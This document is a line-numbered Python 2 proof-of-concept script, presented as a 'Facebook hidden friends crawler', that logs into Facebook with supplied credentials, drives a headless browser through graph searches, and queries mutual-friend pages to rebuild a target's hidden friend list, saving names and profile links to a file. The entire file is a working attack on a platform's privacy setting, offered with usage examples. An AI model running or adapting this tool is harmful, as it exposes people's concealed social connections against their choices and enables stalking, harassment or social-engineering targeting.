fb-hfc.py

1. #!/usr/bin/env python
2. from selenium import webdriver
3. from selenium.webdriver.common.keys import Keys
4. from selenium.webdriver.support import expected_conditions as EC
5. from selenium.webdriver.common.action_chains import ActionChains
6. from StringIO import StringIO
7. from colorama import init
8. from colorama import Fore, Back, Style
9. from pyvirtualdisplay import Display
10. import lxml.html
11. import time
12. import re
13. import requests
14. import argparse
15. import sys
16. import os.path
17.  
18. init(autoreset=True)
19.  
20. print "-----------------------------------------------------------------------------"
21. print "          Facebook hidden friends crawler POC - by Shay Priel"
22. print "-----------------------------------------------------------------------------"
23. print Fore.BLACK + Style.BRIGHT + "                    .@@@@." + Fore.RESET + "                         .:::,           :;::         "
24. print Fore.BLACK + Style.BRIGHT + "  lCCCf;            .@@@@.                         " + Fore.RESET + ".:::,           ::::         "
25. print Fore.BLACK + Style.BRIGHT +  " C@@@@@@t lLLL, tLLL,@@@@iCGL:   :fGGGf,  fLLf:CGf" + Fore.RESET + "..:::,.,,,.,::.  ::::         "
26. print Fore.BLACK + Style.BRIGHT + "i@@@@@@@@,l@@@; G@@@.@@@@@@@@@, ;@@@@@@@: G@@@@@@@C" + Fore.RESET + ".:::,,::::::::..::::,        "
27. print Fore.BLACK + Style.BRIGHT +  "C@@@C@@@@l;@@@l G@@C.@@@@@@@@@t.@@@@@@@@G.@@@@@@@@@" + Fore.RESET + ".:::,,::::::::,.::::,        "
28. print Fore.BLACK + Style.BRIGHT +  "@@@@.i@@@l.@@@f @@@L.@@@@ii@@@C;@@@C.G@@@,@@@@;@@@@" + Fore.RESET + ".:::,,:::, ::::.::::,        "
29. print Fore.BLACK + Style.BRIGHT +  "@@@@ ;@@@l G@@L.@@@t.@@@@.,@@@Ci@@@l L@@@,@@@G G@@@" + Fore.RESET + ".:::,,:::. ,::: ::::         "
30. print Fore.BLACK + Style.BRIGHT +  "@@@@ ;@@@l L@@C,@@@;.@@@@.,@@@Gi@@@i f@@@,@@@G G@@@" + Fore.RESET + ".:::,,:::  ,::: ::::         "
31. print Fore.BLACK + Style.BRIGHT +  "@@@@  ,,,. t@@G;@@@..@@@@.,@@@Ci@@@CfG@@@,@@@G G@@@" + Fore.RESET + ".:::,,:::  :::: ::::         "
32. print Fore.BLACK + Style.BRIGHT +  "@@@@       i@@Gl@@G .@@@@.,@@@Ci@@@@@@@@@,@@@G G@@@" + Fore.RESET + ".:::,,:::  :::: ::::         "
33. print Fore.BLACK + Style.BRIGHT +  "@@@@   .   :@@@f@@L .@@@@.,@@@Ci@@@@GGGGG,@@@G ....." + Fore.RESET + ":::,,:::  :::: ::::         "
34. print Fore.BLACK + Style.BRIGHT +  "@@@@ ;@@@t .@@@G@@t .@@@@.,@@@Ci@@@l      @@@G     " + Fore.RESET + ".:::,,:::  :::: ::::         "
35. print Fore.BLACK + Style.BRIGHT +  "@@@@ ;@@@f  G@@@@@i .@@@@.,@@@Ci@@@l fGGG,@@@G     " + Fore.RESET + ".:::,,:::  :::: ::::         "
36. print Fore.BLACK + Style.BRIGHT +  "@@@@ ;@@@f  L@@@@@: .@@@@.,@@@Ci@@@l f@@@,@@@G     " + Fore.RESET + ".:::,,:::  :::: ::::         "
37. print Fore.BLACK + Style.BRIGHT +  "@@@@,i@@@f  l@@@@@. .@@@@,,@@@Ci@@@t C@@@,@@@G     " + Fore.RESET + ".:::,,:::  :::: ::::         "
38. print Fore.BLACK + Style.BRIGHT +  "G@@@G@@@@l  ;@@@@C  .@@@@LL@@@L:@@@@t@@@@,@@@G     " + Fore.RESET + ".:::,,:::  :::: ::::"+ Fore.RED +"lilll.   "
39. print Fore.BLACK + Style.BRIGHT +  "i@@@@@@@@.  ,@@@@f  .@@@@@@@@@i C@@@@@@@L.@@@G     " + Fore.RESET + " :::,,:::. :::: ::::"+ Fore.RED +"llttt.   "
40. print Fore.BLACK + Style.BRIGHT +  "t@@@@@@i  .;@@@@i  .@@@@f@@@C  ,G@@@@@C  @@@G     " + Fore.RESET + ".:::.,:::  ,::: .:::,"+ Fore.RED +"ltttl.    "
41. print "-----------------------------------------------------------------------------"
42. print "Examples:"
43. print "1. Generates related public profiles:"
44. print "python fb-hfc.py -username <username>  -password '<password>' \n-query '<graph search query>' -output <output.txt>"
45. print "2. Exctracting hidden friends:"
46. print "python fb-hfc.py -username <username>  -password '<password>' \n-target <target> -profilesfile <file.txt> -output <output.txt>"
47. print "-----------------------------------------------------------------------------"
48.  
49.  
50.  
51.  
52. parser = argparse.ArgumentParser(usage="-h for full usage")
53. parser.add_argument('-username', dest="username", help='facebook username to login with (e.g. example@example.com)',required=True)
54. parser.add_argument('-password', dest="password", help='facebook password to login with (e.g. \'password\')',required=True)
55.  
56. parser.add_argument('-query', dest="query", help='graph search query (e.g. "People That Work in Company")',required=False)
57. parser.add_argument('-output', dest="output", help='File name to save results',required=False)
58.  
59. parser.add_argument('-target', dest="target", help='(e.g. "text.example")',required=False)
60. parser.add_argument('-profilesfile', dest="profilesfile", help='File name that contains list of profiles with public friends',required=False)
61.  
62. args = parser.parse_args()
63.  
64. if args.query is None and args.target is None:
65.     parser.error("You must give atleast one method -query or -target")
66.  
67. if args.query and args.target:
68.     parser.error("-query and -target cannot run together")
69.  
70. if args.target and args.profilesfile is None:
71.     parser.error("You must provide -profilesfile")
72.  
73. if args.query and args.profilesfile:
74.     parser.error("-query and -profilesfile cannot run together")
75.  
76. if args.query and args.output is None:
77.     parser.error("You must provide -output")
78.  
79. if args.target and args.output is None:
80.     parser.error("You must provide -output")
81.  
82.  
83. def facebook_login(username,password):
84.     print ("\n\n\nLogin to Facebook...."),
85.     sys.stdout.flush()
86.     url = "http://www.facebook.com"
87.     driver.get(url)
88.     elem = driver.find_element_by_id("email")
89.     elem.send_keys(username)
90.     elem = driver.find_element_by_id("pass")
91.     elem.send_keys(password)
92.     elem.send_keys(Keys.RETURN)
93.     time.sleep(1)
94.     html_source = driver.page_source
95.     if "Please re-enter your password" in html_source or "Incorrect Email" in html_source:
96.         print Fore.RED + "Incorrect Username or Password"
97.         driver.close()
98.         exit()
99.     else:
100.         print Fore.GREEN + "Success\n"
101.     return driver.get_cookies()
102.  
103. def request_url(url,get_cookies):
104.     all_cookies = dict()
105.     for cookie in get_cookies:
106.         all_cookies[cookie["name"]]=cookie["value"]
107.     r = requests.get(url,cookies=all_cookies)
108.     html = r.content
109.     return html
110.  
111. def graph_search(graph_search_query):
112.     print ("Searching for: \"" + Fore.YELLOW + graph_search_query + Fore.RESET + "\"..."),
113.     sys.stdout.flush()
114.     driver.implicitly_wait(5)
115.     time.sleep(1)
116.     elem = driver.find_element_by_xpath("//div[@class='_586i']")
117.     elem.click()
118.     elem.send_keys(graph_search_query)
119.     elem.send_keys(Keys.RETURN)
120.     print Fore.GREEN + "Done\n"
121.  
122. def extract_profiles():
123.     while True:
124.         time.sleep(1)
125.  
126.         try:
127.             elem = driver.find_element_by_xpath(".//th[@class='_4311']")
128.         except:
129.             print "Invalid graph search query! (hint: first try it on facebook)"
130.             driver.close()
131.             exit()
132.  
133.         try:
134.             print "Extracting Profiles...\n"
135.             driver.execute_script("window.scrollTo(0, document.body.scrollHeight);")
136.  
137.             elem = driver.find_element_by_xpath("//div[@class='phm _64f']")
138.             if "End of results" in elem.text:
139.                 break
140.         except:
141.             pass
142.  
143.  
144.  
145.     xpath_name_params = ".//a[@class='_7kf _8o _8s lfloat _ohe']/@href"
146.  
147.  
148.     html_source = driver.page_source
149.  
150.     html_lxml = lxml.html.parse(StringIO(html_source)) #parse to lxml object
151.     params_result = html_lxml.xpath(xpath_name_params)
152.  
153.     data = list()
154.  
155.     for prm in params_result:
156.  
157.         if "profile.php" in prm:
158.             result = re.search('(?<=\profile\.php\?id=)(.*\n?)(?=&ref)', prm)
159.             data.append(result.group())
160.         else:
161.             result = re.search('(?<=\.com\/)(.*\n?)(?=\?)', prm)
162.             data.append(result.group())
163.  
164.     print "Enumerating %s profiles...\n" % len(data)
165.     return data
166.  
167. def extract_mutual_friends(profiles_urls):
168.     print "Enumerating hidden friends from: " + Fore.YELLOW + target + "\n"
169.     data = list()
170.     for profile_url in profiles_urls:
171.         elem = driver.get(profile_url)
172.         print "Enumerating mutual friends: %s" % profile_url
173.  
174.         while True:
175.  
176.             time.sleep(2)
177.             try:
178.                 elem = driver.find_element_by_xpath(".//a[@class='pam uiBoxLightblue uiMorePagerPrimary']")
179.                 elem.click()
180.             except:
181.                 break
182.  
183.  
184.         xpath_name_params = ".//div[@class='fsl fwb fcb']/a/@href"
185.         xpath_name_params2 = ".//div[@class='fsl fwb fcb']/a/text()"
186.  
187.         html_source = driver.page_source
188.  
189.         html_lxml = lxml.html.parse(StringIO(html_source)) #parse to lxml object
190.         params_result = html_lxml.xpath(xpath_name_params)
191.         params_result2 = html_lxml.xpath(xpath_name_params2)
192.        
193.         for prm,prm2 in zip(params_result,params_result2):
194.  
195.             if "profile.php" in prm:
196.                 result = re.search('(?<=\profile\.php\?id=)(.*\n?)(?=&fref=pb_other)', prm)
197.                 if result.group() not in data:
198.                     data.append(result.group())
199.                 if prm2 not in data:
200.                     data.append(prm2)
201.             else:
202.                 result = re.search('(?<=\.com\/)(.*\n?)(?=\?)', prm)
203.                 if result.group() not in data:
204.                     data.append(result.group())
205.                 if prm2 not in data:
206.                     data.append(prm2)
207.  
208.     print Fore.GREEN + "\nTotal of %s hidden friends have been found\n" % str(len(data))
209.     return data
210.  
211.  
212.  
213. def check_if_public(profiles,cookies):
214.     print "Searching for public profiles...\n"
215.     xpath_name_params = ".//a[@id='u_0_1i']/span[@class='_3sz']/text()"
216.     public_profile = list()
217.     digits = re.compile('\d')
218.  
219.     for profile in profiles:
220.         if profile.isdigit():
221.             profile_url = "https://www.facebook.com/profile.php?id=%s&sk=friends" % profile
222.             print("Checking Profile: %s......" % profile),
223.             sys.stdout.flush()
224.         else:
225.             profile_url = "https://www.facebook.com/%s/friends" % profile
226.             print("Checking Profile: %s......" % profile),
227.             sys.stdout.flush()
228.        
229.         html = request_url(profile_url,cookies)
230.  
231.         if "All Friends" in html:
232.             public_profile.append(profile)
233.             print Fore.GREEN + "Public"
234.         else:
235.             print Fore.RED + "None Public"
236.  
237.     print "\nTotal of %s public profiles have been found\n" % str(len(public_profile))
238.     return set(public_profile)
239.  
240.  
241. def generate_mutual_link(profilesfile,target):
242.     mutual_url = list()
243.     for profile in profilesfile:
244.         mutual_url.append("https://www.facebook.com/%s/friends?and=%s" % (target,profile))
245.  
246.     return mutual_url
247.  
248. def open_file(filename):
249.     results = list()
250.     with open(filename, 'r') as myFile:
251.         for line in myFile.readlines():
252.             results.append(line.strip())
253.     return results
254.  
255.  
256. def save_file(filename,results):
257.     if args.profilesfile:
258.         line_items = 2
259.         with open(filename, 'w') as myFile:
260.             for n, user in enumerate(results):
261.                 if (n+1) % line_items:
262.                     if user.isdigit():
263.                         profile_url = "https://www.facebook.com/profile.php?id=%s" % user
264.                     else:
265.                         profile_url = "https://www.facebook.com/%s" % user
266.                     myFile.write("Username: " + user.encode('utf8')+"\n")
267.                 else:
268.                     myFile.write("Full Name: " + user.encode('utf8')+"\n"+"Link to Profile: " + profile_url.encode('utf8')+"\n\n")
269.     else:  
270.         with open(filename, 'w') as myFile:
271.             for user in results:
272.                 myFile.write(user.encode('utf8')+"\n")
273.     print "Saving results to: %s\n\n" % filename
274.  
275.  
276. target = args.target
277. username = args.username
278. password = args.password
279. filename = args.output
280. graph_search_query = args.query
281. profilesfile = args.profilesfile
282.  
283. if args.target and args.profilesfile:
284.     if not os.path.isfile(profilesfile):
285.         print profilesfile +" file doesn't exist"
286.         exit()
287.  
288.  
289.  
290.  
291. display = Display(visible=0, size=(1600, 900))
292. display.start()
293.  
294. driver = webdriver.Firefox()
295.  
296. cookies = dict()
297. cookies = facebook_login(username,password)
298.  
299.  
300. if args.query:
301.     graph_search(graph_search_query)
302.     results = extract_profiles()
303.     results = check_if_public(results,cookies)
304.     save_file(filename,results)
305.     driver.close()
306.     exit()
307.  
308.  
309. if args.target:
310.         profiles = open_file(profilesfile)
311.         results = generate_mutual_link(profiles,target)
312.         results = extract_mutual_friends(results)
313.         save_file(filename,results)
314.         driver.close()
315.         exit()